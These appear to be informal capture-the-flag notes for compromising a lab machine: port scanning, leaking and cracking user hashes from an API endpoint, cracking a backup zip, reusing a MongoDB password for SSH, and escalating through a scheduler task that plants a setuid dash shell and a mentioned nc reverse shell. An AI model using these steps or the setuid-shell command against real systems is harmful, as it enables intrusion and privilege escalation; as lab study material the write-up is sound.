OS:
- Linux

Open Ports:
PORT     STATE SERVICE         VERSION
- 22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- |   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
- |   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
- |_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
- 3000/tcp open  hadoop-datanode Apache Hadoop
- | hadoop-datanode-info:
- |_  Logs: /login
- | hadoop-tasktracker-info:
- |_  Logs: /login

- trying dirbuster, but not working
- spidering webpage
- found page:
http://10.10.10.58:3000/api/users/latest
- went back one dir: /api/users
- found users + hashes

users:
myP14ceAdm1nAcc0uNT
tom
mark
rastating

cracking hashes. 3 cracked

dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

- creds:
myP14ceAdm1nAcc0uNT:manchester
tom:spongebob
mark:snowflake

- login to webpage with admin creds
- got backup file
- base64 decoded
- password protected zip file, zip2john to crack
- got password: magicword

- webserver backup
- searching for password in files
- found in app.js:
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

trying ssh with mark:5AYRft73VtFpc84k
- got user access
- linenum scripts
- found processes for tom:
tom       1227  0.1  6.8 1109040 52060 ?       Ssl  Dec13   0:10 /usr/bin/node /var/www/myplace/app.js
tom       1230  0.0  5.5 1074104 42036 ?       Ssl  Dec13   0:02 /usr/bin/node /var/scheduler/app.js

- version: MongoDB shell version: 3.2.16
- reviewing scheduler script
- logs onto mongo db and runs task
- logged onto mongo db and created task:
db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/dash-shell; chmod 6755 /tmp/dash-shell" } )

- modified command to get reverse shell through nc reverse shell
- got access to user tom
- looking for setuid files
- /usr/local/bin/backup
- filetype: 32bit ELF
- running strings:
encoded backup string as base64

- opening in ghidra to view file behavior
- file accepts 3 arguments, strcmp for first one being -q
- second argument points to key file
- bad characters are listed in file, although 'root' is not one of them
- cd to root directory
- used absolute path to execute file, then used 'root' as 3rd argument
- got root backup
- got root flag
